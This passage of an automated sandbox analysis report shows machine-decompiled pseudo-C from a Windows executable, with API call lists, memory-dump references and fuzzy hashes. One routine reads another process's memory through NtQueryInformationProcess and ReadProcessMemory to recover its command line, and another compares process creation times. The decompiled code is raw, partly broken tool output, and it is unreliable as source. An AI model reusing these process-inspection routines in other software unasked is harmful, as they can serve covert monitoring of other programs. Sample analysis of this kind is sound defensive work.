                                                                                                											_t252[1] =  *(_t252 + 4 + _t238 * 8);
                                                                                                											 *(_t252 + _t238 * 8) = _v720;
                                                                                                											 *(_t252 + 4 + _t238 * 8) = _v712;
                                                                                                										}
                                                                                                										goto L25;
                                                                                                									}
                                                                                                									L37:
                                                                                                									_t170 = _t204 * 0xc;
                                                                                                									_t106 = _t170 + 0xfbc718; // 0xf8176a
                                                                                                									 *0xfb81fc(_t240);
                                                                                                									_t172 =  *((intOrPtr*)( *_t106))();
                                                                                                									_t225 = _v728;
                                                                                                									__eflags = _t172;
                                                                                                									if(_t172 == 0) {
                                                                                                										__eflags = _t225 - 0xfcf198;
                                                                                                										if(_t225 != 0xfcf198) {
                                                                                                											_t251 = _t204 + _t204;
                                                                                                											__eflags = _t251;
                                                                                                											asm("lock xadd [eax], ecx");
                                                                                                											if(_t251 != 0) {
                                                                                                												goto L44;
                                                                                                											} else {
                                                                                                												E00FA609F( *((intOrPtr*)(_t240 + 0x28 + _t251 * 8)));
                                                                                                												E00FA609F( *((intOrPtr*)(_t240 + 0x24 + _t251 * 8)));
                                                                                                												E00FA609F( *(_t240 + 0xa0 + _t204 * 4));
                                                                                                												_t228 = _v704;
                                                                                                												 *(_v716 + _t240) = _t228;
                                                                                                												 *(_t240 + 0xa0 + _t204 * 4) = _t228;
                                                                                                											}
                                                                                                										}
                                                                                                										_t226 = _v732;
                                                                                                										 *_t226 = 1;
                                                                                                										 *((intOrPtr*)(_t240 + 0x28 + (_t204 + _t204) * 8)) = _t226;
                                                                                                									} else {
                                                                                                										 *((intOrPtr*)(_v716 + _t240)) = _t225;
                                                                                                										E00FA609F( *(_t240 + 0xa0 + _t204 * 4));
                                                                                                										 *(_t240 + 0xa0 + _t204 * 4) = _v740;
                                                                                                										E00FA609F(_v732);
                                                                                                										 *(_t240 + 8) = _v744;
                                                                                                										goto L39;
                                                                                                									}
                                                                                                									goto L40;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							L40:
                                                                                                							return E00F80D7F(_v8 ^ _t256, _t238);
                                                                                                						}
                                                                                                						goto L48;
                                                                                                					}
                                                                                                					asm("sbb eax, eax");
                                                                                                					_t157 = _t156 | 0x00000001;
                                                                                                					__eflags = _t157;
                                                                                                					goto L8;
                                                                                                				}
                                                                                                				L48:
                                                                                                			}
























































                                                                                                0x00fa420c
                                                                                                0x00fa420f
                                                                                                0x00fa4217
                                                                                                0x00fa421e
                                                                                                0x00fa4221
                                                                                                0x00fa4222
                                                                                                0x00fa4225
                                                                                                0x00fa4229
                                                                                                0x00fa422a
                                                                                                0x00fa422d
                                                                                                0x00fa423d
                                                                                                0x00fa4260
                                                                                                0x00fa4265
                                                                                                0x00fa426a
                                                                                                0x00fa4542
                                                                                                0x00fa4542
                                                                                                0x00000000
                                                                                                0x00fa4270
                                                                                                0x00fa4270
                                                                                                0x00fa4273
                                                                                                0x00fa4276
                                                                                                0x00fa427c
                                                                                                0x00fa4282
                                                                                                0x00fa4285
                                                                                                0x00fa4287
                                                                                                0x00fa428a
                                                                                                0x00fa4294
                                                                                                0x00fa429a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa42a0
                                                                                                0x00fa42c9
                                                                                                0x00fa42c9
                                                                                                0x00fa42a2
                                                                                                0x00fa42a2
                                                                                                0x00fa42aa
                                                                                                0x00fa42b1
                                                                                                0x00fa42b7
                                                                                                0x00000000
                                                                                                0x00fa42b9
                                                                                                0x00fa42b9
                                                                                                0x00fa42bc
                                                                                                0x00fa42c7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa42c7
                                                                                                0x00fa42b7
                                                                                                0x00fa42d6
                                                                                                0x00fa42d8
                                                                                                0x00fa42e1
                                                                                                0x00fa42e7
                                                                                                0x00fa42ea
                                                                                                0x00fa42ea
                                                                                                0x00fa42ed
                                                                                                0x00fa42f0
                                                                                                0x00fa42f0
                                                                                                0x00fa4300
                                                                                                0x00fa430e
                                                                                                0x00fa4313
                                                                                                0x00fa431a
                                                                                                0x00fa431c
                                                                                                0x00000000
                                                                                                0x00fa4322
                                                                                                0x00fa4328
                                                                                                0x00fa4335
                                                                                                0x00fa433e
                                                                                                0x00fa4351
                                                                                                0x00fa4358
                                                                                                0x00fa435d
                                                                                                0x00fa4360
                                                                                                0x00fa4362
                                                                                                0x00fa45c4
                                                                                                0x00fa45ca
                                                                                                0x00fa45cb
                                                                                                0x00fa45cc
                                                                                                0x00fa45cd
                                                                                                0x00fa45ce
                                                                                                0x00fa45cf
                                                                                                0x00fa45d4
                                                                                                0x00fa45d5
                                                                                                0x00fa45db
                                                                                                0x00fa4368
                                                                                                0x00fa4368
                                                                                                0x00fa4376
                                                                                                0x00fa4379
                                                                                                0x00fa438f
                                                                                                0x00fa4396
                                                                                                0x00fa439c
                                                                                                0x00fa437b
                                                                                                0x00fa437b
                                                                                                0x00fa4383
                                                                                                0x00000000
                                                                                                0x00fa4385
                                                                                                0x00fa4385
                                                                                                0x00fa438b
                                                                                                0x00fa438b
                                                                                                0x00fa4383
                                                                                                0x00fa43a2
                                                                                                0x00fa43a9
                                                                                                0x00fa43ac
                                                                                                0x00fa44cc
                                                                                                0x00fa44cf
                                                                                                0x00fa44dc
                                                                                                0x00fa44df
                                                                                                0x00fa44e7
                                                                                                0x00fa44e7
                                                                                                0x00fa44d1
                                                                                                0x00fa44d7
                                                                                                0x00fa44d7
                                                                                                0x00fa43b2
                                                                                                0x00fa43b2
                                                                                                0x00fa43b8
                                                                                                0x00fa43c0
                                                                                                0x00fa43c2
                                                                                                0x00fa43c5
                                                                                                0x00fa43ce
                                                                                                0x00fa43d7
                                                                                                0x00fa43dd
                                                                                                0x00fa43e0
                                                                                                0x00fa43e2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa43e4
                                                                                                0x00fa43ea
                                                                                                0x00fa43eb
                                                                                                0x00fa43f6
                                                                                                0x00fa43fe
                                                                                                0x00fa4406
                                                                                                0x00fa4409
                                                                                                0x00fa440c
                                                                                                0x00fa4412
                                                                                                0x00fa4418
                                                                                                0x00fa441e
                                                                                                0x00fa4424
                                                                                                0x00fa4427
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00fa4429
                                                                                                0x00fa444e
                                                                                                0x00fa444e
                                                                                                0x00fa4451
                                                                                                0x00fa446e
                                                                                                0x00fa4473
                                                                                                0x00fa4476
                                                                                                0x00fa4478
                                                                                                0x00fa44b6
                                                                                                0x00fa447a
                                                                                                0x00fa447a
                                                                                                0x00fa4480
                                                                                                0x00fa4485
                                                                                                0x00fa448d
                                                                                                0x00fa448e
                                                                                                0x00fa448e
                                                                                                0x00fa44a5
                                                                                                0x00fa44ac
                                                                                                0x00fa44af
                                                                                                0x00fa44b1
                                                                                                0x00fa44b1
                                                                                                0x00fa44bc
                                                                                                0x00fa44c2
                                                                                                0x00fa44c2
                                                                                                0x00fa44c7
                                                                                                0x00000000
                                                                                                0x00fa44c7
                                                                                                0x00fa442b
                                                                                                0x00fa442d
                                                                                                0x00fa4432
                                                                                                0x00fa4438
                                                                                                0x00fa4441
                                                                                                0x00fa444a
                                                                                                0x00fa444a
                                                                                                0x00000000
                                                                                                0x00fa442d
                                                                                                0x00fa44ea
                                                                                                0x00fa44ea
                                                                                                0x00fa44ee
                                                                                                0x00fa44f6
                                                                                                0x00fa44fc
                                                                                                0x00fa44ff
                                                                                                0x00fa4505
                                                                                                0x00fa4507
                                                                                                0x00fa4555
                                                                                                0x00fa455b
                                                                                                0x00fa4562
                                                                                                0x00fa4562
                                                                                                0x00fa4568
                                                                                                0x00fa456c
                                                                                                0x00000000
                                                                                                0x00fa456e
                                                                                                0x00fa4572
                                                                                                0x00fa457b
                                                                                                0x00fa4587
                                                                                                0x00fa4595
                                                                                                0x00fa459b
                                                                                                0x00fa459e
                                                                                                0x00fa459e
                                                                                                0x00fa456c
                                                                                                0x00fa45ad
                                                                                                0x00fa45b5
                                                                                                0x00fa45be
                                                                                                0x00fa4509
                                                                                                0x00fa450f
                                                                                                0x00fa4519
                                                                                                0x00fa452b
                                                                                                0x00fa4532
                                                                                                0x00fa453f
                                                                                                0x00000000
                                                                                                0x00fa453f
                                                                                                0x00000000
                                                                                                0x00fa4507
                                                                                                0x00fa4362
                                                                                                0x00fa42da
                                                                                                0x00fa4544
                                                                                                0x00fa4554
                                                                                                0x00fa4554
                                                                                                0x00000000
                                                                                                0x00fa42d8
                                                                                                0x00fa42d1
                                                                                                0x00fa42d3
                                                                                                0x00fa42d3
                                                                                                0x00000000
                                                                                                0x00fa42d3
                                                                                                0x00000000

                                                                                                APIs
                                                                                                  • Part of subcall function 00FA5DF2: GetLastError.KERNEL32(?,?,00000008,00FAA789,00F85649,00F8568F), ref: 00FA5DF7
                                                                                                  • Part of subcall function 00FA5DF2: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00FA5E95
                                                                                                • _memcmp.LIBVCRUNTIME ref: 00FA44A5
                                                                                                • _free.LIBCMT ref: 00FA4519
                                                                                                • _free.LIBCMT ref: 00FA4532
                                                                                                • _free.LIBCMT ref: 00FA4572
                                                                                                • _free.LIBCMT ref: 00FA457B
                                                                                                • _free.LIBCMT ref: 00FA4587
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorLast$_memcmp
                                                                                                • String ID: C
                                                                                                • API String ID: 4275183328-1037565863
                                                                                                • Opcode ID: 3333e239dca907f3dad1c5a7338b183bde6360f5a58c1f13ad211ae539bd91cf
                                                                                                • Instruction ID: f8cc5e959a0e6ef266ca732d5b29759014446cddde5fc8556730f7e4ad5ff3b3
                                                                                                • Opcode Fuzzy Hash: 3333e239dca907f3dad1c5a7338b183bde6360f5a58c1f13ad211ae539bd91cf
                                                                                                • Instruction Fuzzy Hash: C2B137B5E012199FDB24DF28CC84BA9B3B5FB49314F1485AAE809A7351D771AE90DF40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 44%
                                                                                                			E00F73B50(void* __ebx, short* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				DWORD* _v8;
                                                                                                				char _v16;
                                                                                                				signed int _v20;
                                                                                                				DWORD* _v24;
                                                                                                				DWORD* _v28;
                                                                                                				char _v44;
                                                                                                				void* _v48;
                                                                                                				signed int _v52;
                                                                                                				void _v116;
                                                                                                				void* _v572;
                                                                                                				void _v588;
                                                                                                				DWORD* _v592;
                                                                                                				long _v596;
                                                                                                				DWORD* _v600;
                                                                                                				char _v604;
                                                                                                				short* _v608;
                                                                                                				short* _v612;
                                                                                                				void* _v632;
                                                                                                				char _v636;
                                                                                                				signed int _t64;
                                                                                                				signed int _t65;
                                                                                                				struct HINSTANCE__* _t68;
                                                                                                				signed int _t69;
                                                                                                				signed int _t86;
                                                                                                				DWORD* _t95;
                                                                                                				_Unknown_base(*)()* _t99;
                                                                                                				DWORD* _t108;
                                                                                                				void* _t117;
                                                                                                				short* _t120;
                                                                                                				signed int _t122;
                                                                                                
                                                                                                				_t115 = __edx;
                                                                                                				_push(0xffffffff);
                                                                                                				_push(0xfb5987);
                                                                                                				_push( *[fs:0x0]);
                                                                                                				_t64 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_t65 = _t64 ^ _t122;
                                                                                                				_v20 = _t65;
                                                                                                				_push(_t65);
                                                                                                				 *[fs:0x0] =  &_v16;
                                                                                                				_t117 = __edx;
                                                                                                				_t120 = __ecx;
                                                                                                				_v608 = __ecx;
                                                                                                				_v612 = __ecx;
                                                                                                				_v592 = 0;
                                                                                                				E00F73610(__ebx,  &_v604, __edx);
                                                                                                				_v8 = 1;
                                                                                                				asm("xorps xmm0, xmm0");
                                                                                                				_t68 = _v600;
                                                                                                				asm("movq [ebp-0x268], xmm0");
                                                                                                				asm("movups [ebp-0x278], xmm0");
                                                                                                				if(_t68 == 0) {
                                                                                                					L4:
                                                                                                					_t69 = 0xc0000002;
                                                                                                				} else {
                                                                                                					_t99 = GetProcAddress(_t68, "NtQueryInformationProcess");
                                                                                                					if(_t99 == 0) {
                                                                                                						_v596 = GetLastError();
                                                                                                						goto L4;
                                                                                                					} else {
                                                                                                						_t69 =  *_t99(_t117, 0,  &_v636, 0x18, 0);
                                                                                                					}
                                                                                                				}
                                                                                                				if((_t69 & 0xc0000000) != 0xc0000000) {
                                                                                                					E00F95A00(_t117,  &_v588, 0, 0x1d8);
                                                                                                					if((ReadProcessMemory(_t117, _v632,  &_v588, 0x1d8, 0) & 0xc0000000) != 0xc0000000) {
                                                                                                						E00F95A00(_t117,  &_v116, 0, 0x48);
                                                                                                						if((ReadProcessMemory(_t117, _v572,  &_v116, 0x48, 0) & 0xc0000000) != 0xc0000000) {
                                                                                                							if(_v52 != 0) {
                                                                                                								_v28 = 0;
                                                                                                								_v24 = 0;
                                                                                                								_v28 = 0;
                                                                                                								_v24 = 7;
                                                                                                								_v44 = 0;
                                                                                                								_v8 = 6;
                                                                                                								E00F71360( &_v44, (_v52 & 0x0000ffff) >> 1, 0);
                                                                                                								_t106 =  >=  ? _v44 :  &_v44;
                                                                                                								_t86 = ReadProcessMemory(_t117, _v48,  >=  ? _v44 :  &_v44, _v52 & 0x0000ffff, 0);
                                                                                                								 *(_t120 + 0x10) = 0;
                                                                                                								_v592 = 1;
                                                                                                								if((_t86 & 0xc0000000) != 0xc0000000) {
                                                                                                									asm("movups xmm0, [ebp-0x28]");
                                                                                                									 *(_t120 + 0x14) = 0;
                                                                                                									_v44 = 0;
                                                                                                									asm("movups [esi], xmm0");
                                                                                                									asm("movq xmm0, [ebp-0x18]");
                                                                                                									asm("movq [esi+0x10], xmm0");
                                                                                                									_v28 = 0;
                                                                                                									_v24 = 7;
                                                                                                									_v8 = 1;
                                                                                                									E00F72D10( &_v44);
                                                                                                									_v8 = 0;
                                                                                                									_t108 = _v600;
                                                                                                									_v604 = 0xfc6f8c;
                                                                                                									if(_t108 != 0) {
                                                                                                										_push(_t108);
                                                                                                										goto L19;
                                                                                                									}
                                                                                                								} else {
                                                                                                									 *(_t120 + 0x14) = 7;
                                                                                                									 *_t120 = 0;
                                                                                                									_v8 = 1;
                                                                                                									E00F72D10( &_v44);
                                                                                                									goto L7;
                                                                                                								}
                                                                                                							} else {
                                                                                                								 *(_t120 + 0x10) = 0;
                                                                                                								 *(_t120 + 0x14) = 7;
                                                                                                								 *_t120 = 0;
                                                                                                								_v592 = 1;
                                                                                                								goto L7;
                                                                                                							}
                                                                                                						} else {
                                                                                                							 *(_t120 + 0x10) = 0;
                                                                                                							 *(_t120 + 0x14) = 7;
                                                                                                							 *_t120 = 0;
                                                                                                							_v592 = 1;
                                                                                                							goto L7;
                                                                                                						}
                                                                                                					} else {
                                                                                                						 *(_t120 + 0x10) = 0;
                                                                                                						 *(_t120 + 0x14) = 7;
                                                                                                						 *_t120 = 0;
                                                                                                						_v592 = 1;
                                                                                                						goto L7;
                                                                                                					}
                                                                                                				} else {
                                                                                                					 *(_t120 + 0x10) = 0;
                                                                                                					 *(_t120 + 0x14) = 7;
                                                                                                					 *_t120 = 0;
                                                                                                					_v592 = 1;
                                                                                                					L7:
                                                                                                					_v8 = 0;
                                                                                                					_t95 = _v600;
                                                                                                					_v604 = 0xfc6f8c;
                                                                                                					if(_t95 != 0) {
                                                                                                						_push(_t95);
                                                                                                						L19:
                                                                                                						FreeLibrary();
                                                                                                						_v600 = 0;
                                                                                                					}
                                                                                                				}
                                                                                                				 *[fs:0x0] = _v16;
                                                                                                				return E00F80D7F(_v20 ^ _t122, _t115);
                                                                                                			}

































                                                                                                0x00f73b50
                                                                                                0x00f73b53
                                                                                                0x00f73b55
                                                                                                0x00f73b60
                                                                                                0x00f73b67
                                                                                                0x00f73b6c
                                                                                                0x00f73b6e
                                                                                                0x00f73b73
                                                                                                0x00f73b77
                                                                                                0x00f73b7d
                                                                                                0x00f73b7f
                                                                                                0x00f73b81
                                                                                                0x00f73b8a
                                                                                                0x00f73b96
                                                                                                0x00f73ba0
                                                                                                0x00f73ba5
                                                                                                0x00f73bac
                                                                                                0x00f73baf
                                                                                                0x00f73bb5
                                                                                                0x00f73bbd
                                                                                                0x00f73bc6
                                                                                                0x00f73bf6
                                                                                                0x00f73bf6
                                                                                                0x00f73bc8
                                                                                                0x00f73bce
                                                                                                0x00f73bd6
                                                                                                0x00f73bf0
                                                                                                0x00000000
                                                                                                0x00f73bd8
                                                                                                0x00f73be6
                                                                                                0x00f73be6
                                                                                                0x00f73bd6
                                                                                                0x00f73c05
                                                                                                0x00f73c57
                                                                                                0x00f73c84
                                                                                                0x00f73cb0
                                                                                                0x00f73cd7
                                                                                                0x00f73d01
                                                                                                0x00f73d1f
                                                                                                0x00f73d26
                                                                                                0x00f73d2d
                                                                                                0x00f73d34
                                                                                                0x00f73d3b
                                                                                                0x00f73d3f
                                                                                                0x00f73d4f
                                                                                                0x00f73d5f
                                                                                                0x00f73d6b
                                                                                                0x00f73d76
                                                                                                0x00f73d7d
                                                                                                0x00f73d8c
                                                                                                0x00f73dab
                                                                                                0x00f73daf
                                                                                                0x00f73db8
                                                                                                0x00f73dbc
                                                                                                0x00f73dbf
                                                                                                0x00f73dc4
                                                                                                0x00f73dc9
                                                                                                0x00f73dd0
                                                                                                0x00f73dd7
                                                                                                0x00f73dde
                                                                                                0x00f73de3
                                                                                                0x00f73dea
                                                                                                0x00f73df0
                                                                                                0x00f73dfc
                                                                                                0x00f73dfe
                                                                                                0x00000000
                                                                                                0x00f73dfe
                                                                                                0x00f73d8e
                                                                                                0x00f73d8e
                                                                                                0x00f73d97
                                                                                                0x00f73d9a
                                                                                                0x00f73da1
                                                                                                0x00000000
                                                                                                0x00f73da1
                                                                                                0x00f73d03
                                                                                                0x00f73d03
                                                                                                0x00f73d06
                                                                                                0x00f73d0d
                                                                                                0x00f73d10
                                                                                                0x00000000
                                                                                                0x00f73d10
                                                                                                0x00f73cd9
                                                                                                0x00f73cdb
                                                                                                0x00f73ce2
                                                                                                0x00f73ce9
                                                                                                0x00f73cec
                                                                                                0x00000000
                                                                                                0x00f73cec
                                                                                                0x00f73c86
                                                                                                0x00f73c88
                                                                                                0x00f73c8f
                                                                                                0x00f73c96
                                                                                                0x00f73c99
                                                                                                0x00000000
                                                                                                0x00f73c99
                                                                                                0x00f73c07
                                                                                                0x00f73c09
                                                                                                0x00f73c10
                                                                                                0x00f73c17
                                                                                                0x00f73c1a
                                                                                                0x00f73c24
                                                                                                0x00f73c24
                                                                                                0x00f73c2b
                                                                                                0x00f73c31
                                                                                                0x00f73c3d
                                                                                                0x00f73c43
                                                                                                0x00f73dff
                                                                                                0x00f73dff
                                                                                                0x00f73e05
                                                                                                0x00f73e05
                                                                                                0x00f73c3d
                                                                                                0x00f73e14
                                                                                                0x00f73e2b

                                                                                                APIs
                                                                                                  • Part of subcall function 00F73610: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00F73675
                                                                                                  • Part of subcall function 00F73610: _wcschr.LIBVCRUNTIME ref: 00F73706
                                                                                                • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00F73BCE
                                                                                                • GetLastError.KERNEL32 ref: 00F73BEA
                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000), ref: 00F73C74
                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000,?,000001D8,00000000), ref: 00F73CC7
                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,00000048,00000000,?,000001D8,00000000), ref: 00F73D6B
                                                                                                  • Part of subcall function 00F72D10: LocalFree.KERNEL32(?,FD8FA683,?,?,00FB53A0,000000FF,?,00F71152,FD8FA683,?,?,00FB5350,000000FF), ref: 00F72D61
                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,?,?,00000048,00000000,?,000001D8,00000000), ref: 00F73DFF
                                                                                                Strings
                                                                                                • NtQueryInformationProcess, xrefs: 00F73BC8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessRead$Free$AddressDirectoryErrorLastLibraryLocalProcSystem_wcschr
                                                                                                • String ID: NtQueryInformationProcess
                                                                                                • API String ID: 3003745107-2781105232
                                                                                                • Opcode ID: 23e385e1d840b69d660fcf9d440a2fb736d4fc38d2f6de571493ee5ab52e4528
                                                                                                • Instruction ID: aeb2364a764bbdcaa542a1b5296b03508028e2209bdcad3305a4c6f27d4c5f16
                                                                                                • Opcode Fuzzy Hash: 23e385e1d840b69d660fcf9d440a2fb736d4fc38d2f6de571493ee5ab52e4528
                                                                                                • Instruction Fuzzy Hash: 42719F70C04759AEEB60DF64CC49BAEBBF4EF08714F10464AE409A7280D7B95688EF52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 91%
                                                                                                			E00F74550(long __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                				struct _FILETIME* _v8;
                                                                                                				struct _FILETIME* _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _v20;
                                                                                                				long _v24;
                                                                                                				void* _v28;
                                                                                                				long _v32;
                                                                                                				signed int _v36;
                                                                                                				intOrPtr _v40;
                                                                                                				struct _FILETIME* _v44;
                                                                                                				intOrPtr _v48;
                                                                                                				struct _FILETIME* _v52;
                                                                                                				intOrPtr _v56;
                                                                                                				struct _FILETIME _v64;
                                                                                                				struct _FILETIME _v72;
                                                                                                				void* _v84;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __ebp;
                                                                                                				signed int _t89;
                                                                                                				signed int _t94;
                                                                                                				signed int _t100;
                                                                                                				long _t103;
                                                                                                				long _t104;
                                                                                                				void* _t122;
                                                                                                				signed int _t123;
                                                                                                				signed int _t140;
                                                                                                				long _t141;
                                                                                                				void* _t142;
                                                                                                				long _t143;
                                                                                                				void* _t144;
                                                                                                				long _t148;
                                                                                                				void* _t151;
                                                                                                				intOrPtr* _t154;
                                                                                                				void* _t155;
                                                                                                				void* _t158;
                                                                                                				void* _t166;
                                                                                                				long _t167;
                                                                                                				long _t168;
                                                                                                				long _t169;
                                                                                                				void** _t174;
                                                                                                				void* _t176;
                                                                                                				signed int _t179;
                                                                                                				long _t181;
                                                                                                				void* _t182;
                                                                                                				signed int _t186;
                                                                                                				void* _t188;
                                                                                                				signed int _t189;
                                                                                                
                                                                                                				_t148 = __ecx;
                                                                                                				_push(0xffffffff);
                                                                                                				_push(0xfb59f0);
                                                                                                				_push( *[fs:0x0]);
                                                                                                				_t189 = _t188 - 0x14;
                                                                                                				_push(_t143);
                                                                                                				_t89 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_push(_t89 ^ _t186);
                                                                                                				 *[fs:0x0] =  &_v16;
                                                                                                				_v20 = _t189;
                                                                                                				_t174 = __ecx;
                                                                                                				_t179 =  *__ecx;
                                                                                                				_t166 = _a4 - _t179 >> 2;
                                                                                                				_v28 = _t166;
                                                                                                				_t94 =  *((intOrPtr*)(__ecx + 4)) - _t179 >> 2;
                                                                                                				if(_t94 == 0x3fffffff) {
                                                                                                					L24:
                                                                                                					E00F71C90(_t148);
                                                                                                					goto L25;
                                                                                                				} else {
                                                                                                					_t6 = _t94 + 1; // 0x2
                                                                                                					_t143 = _t6;
                                                                                                					_v36 = _t143;
                                                                                                					_t148 =  *((intOrPtr*)(__ecx + 8)) - _t179 >> 2;
                                                                                                					_t179 = _t148 >> 1;
                                                                                                					if(_t148 <= 0x3fffffff - _t179) {
                                                                                                						_t122 = _t179 + _t148;
                                                                                                						__eflags = _t122 - _t143;
                                                                                                						_t123 =  <  ? _t143 : _t122;
                                                                                                						_v32 = _t123;
                                                                                                					} else {
                                                                                                						_t123 = _t143;
                                                                                                						_v32 = _t143;
                                                                                                					}
                                                                                                					if(_t123 > 0x3fffffff) {
                                                                                                						L23:
                                                                                                						E00F72A40(_t143, _t166, _t174, _t186, __eflags);
                                                                                                						goto L24;
                                                                                                					} else {
                                                                                                						_t143 = _t123 * 4;
                                                                                                						if(_t143 < 0x1000) {
                                                                                                							__eflags = _t143;
                                                                                                							if(_t143 == 0) {
                                                                                                								_t179 = 0;
                                                                                                								__eflags = 0;
                                                                                                								goto L12;
                                                                                                							} else {
                                                                                                								_t140 = LocalAlloc(0x40, _t143);
                                                                                                								_t179 = _t140;
                                                                                                								_v24 = _t140;
                                                                                                								_t166 = _v28;
                                                                                                							}
                                                                                                							goto L13;
                                                                                                						} else {
                                                                                                							_t13 = _t143 + 0x23; // 0x25
                                                                                                							_t141 = _t13;
                                                                                                							if(_t141 <= _t143) {
                                                                                                								goto L23;
                                                                                                							} else {
                                                                                                								_t142 = LocalAlloc(0x40, _t141);
                                                                                                								if(_t142 == 0) {
                                                                                                									L25:
                                                                                                									E00F98D9C(_t143, _t148, _t166, _t174, __eflags);
                                                                                                									E00F740E0(_t143, _t174, _t186, _v24, _v32);
                                                                                                									E00F95B96(0, 0);
                                                                                                									asm("int3");
                                                                                                									_push(_t186);
                                                                                                									_push(0xffffffff);
                                                                                                									_push(0xfb5a20);
                                                                                                									_push( *[fs:0x0]);
                                                                                                									_push(_t143);
                                                                                                									_push(_t179);
                                                                                                									_push(_t174);
                                                                                                									_t100 =  *0xfcf00c; // 0xfd8fa683
                                                                                                									_push(_t100 ^ _t189);
                                                                                                									 *[fs:0x0] =  &_v64;
                                                                                                									_t144 = _t166;
                                                                                                									_v84 = _t144;
                                                                                                									_t167 = _t148;
                                                                                                									_t103 = _t167;
                                                                                                									_v72.dwLowDateTime = _t103;
                                                                                                									__eflags = _t167 - _t144;
                                                                                                									if(_t167 != _t144) {
                                                                                                										_t168 = _t167 + 4;
                                                                                                										_v32 = _t168;
                                                                                                										__eflags = _t168 - _t144;
                                                                                                										if(_t168 != _t144) {
                                                                                                											do {
                                                                                                												_t104 =  *_t103;
                                                                                                												_t181 =  *_t168;
                                                                                                												_v36 = _t181;
                                                                                                												_v24 = _t104;
                                                                                                												_t176 = OpenProcess(0x400, 0, _t104);
                                                                                                												_v56 = 0xfc6b50;
                                                                                                												_v52 = _t176;
                                                                                                												_v12 = 0;
                                                                                                												_t182 = OpenProcess(0x400, 0, _t181);
                                                                                                												_v48 = 0xfc6b50;
                                                                                                												_v44 = _t182;
                                                                                                												_v12 = 1;
                                                                                                												__eflags = _t176 - 0xffffffff;
                                                                                                												if(_t176 == 0xffffffff) {
                                                                                                													L44:
                                                                                                													_v12 = 0;
                                                                                                													_v48 = 0xfc6b50;
                                                                                                													__eflags = _t182;
                                                                                                													if(_t182 != 0) {
                                                                                                														CloseHandle(_t182);
                                                                                                														_v44 = 0;
                                                                                                													}
                                                                                                													_v12 = 0xffffffff;
                                                                                                													_v56 = 0xfc6b50;
                                                                                                													__eflags = _t176;
                                                                                                													if(_t176 != 0) {
                                                                                                														CloseHandle(_t176);
                                                                                                														_v52 = 0;
                                                                                                													}
                                                                                                													_t151 = 0;
                                                                                                													__eflags = 0;
                                                                                                												} else {
                                                                                                													__eflags = _t182 - 0xffffffff;
                                                                                                													if(_t182 == 0xffffffff) {
                                                                                                														goto L44;
                                                                                                													} else {
                                                                                                														GetProcessTimes(_t176,  &_v64, 0, 0, 0);
                                                                                                														GetProcessTimes(_t182,  &_v72, 0, 0, 0);
                                                                                                														__eflags = _v64.dwHighDateTime - _v72.dwHighDateTime;
                                                                                                														if(__eflags <= 0) {
                                                                                                															if(__eflags != 0) {
                                                                                                																L39:
                                                                                                																_v12 = 0;
                                                                                                																_v48 = 0xfc6b50;
                                                                                                																__eflags = _t182;
                                                                                                																if(_t182 != 0) {
                                                                                                																	CloseHandle(_t182);
                                                                                                																	_v44 = 0;
                                                                                                																}
                                                                                                																_v12 = 0xffffffff;
                                                                                                																_v56 = 0xfc6b50;
                                                                                                																__eflags = _t176;
                                                                                                																if(_t176 != 0) {
                                                                                                																	CloseHandle(_t176);
                                                                                                																	_v52 = 0;
                                                                                                																}
                                                                                                																_t151 = _v36;
                                                                                                															} else {
                                                                                                																__eflags = _v64.dwLowDateTime - _v72.dwLowDateTime;
                                                                                                																if(_v64.dwLowDateTime >= _v72.dwLowDateTime) {
                                                                                                																	goto L32;
                                                                                                																} else {
                                                                                                																	goto L39;
                                                                                                																}
                                                                                                															}
                                                                                                														} else {
                                                                                                															L32:
                                                                                                															_v12 = 0;
                                                                                                															_v48 = 0xfc6b50;
                                                                                                															__eflags = _t182;
                                                                                                															if(_t182 != 0) {
                                                                                                																CloseHandle(_t182);
                                                                                                																_v44 = 0;
                                                                                                															}
                                                                                                															_v12 = 0xffffffff;
                                                                                                															_v56 = 0xfc6b50;
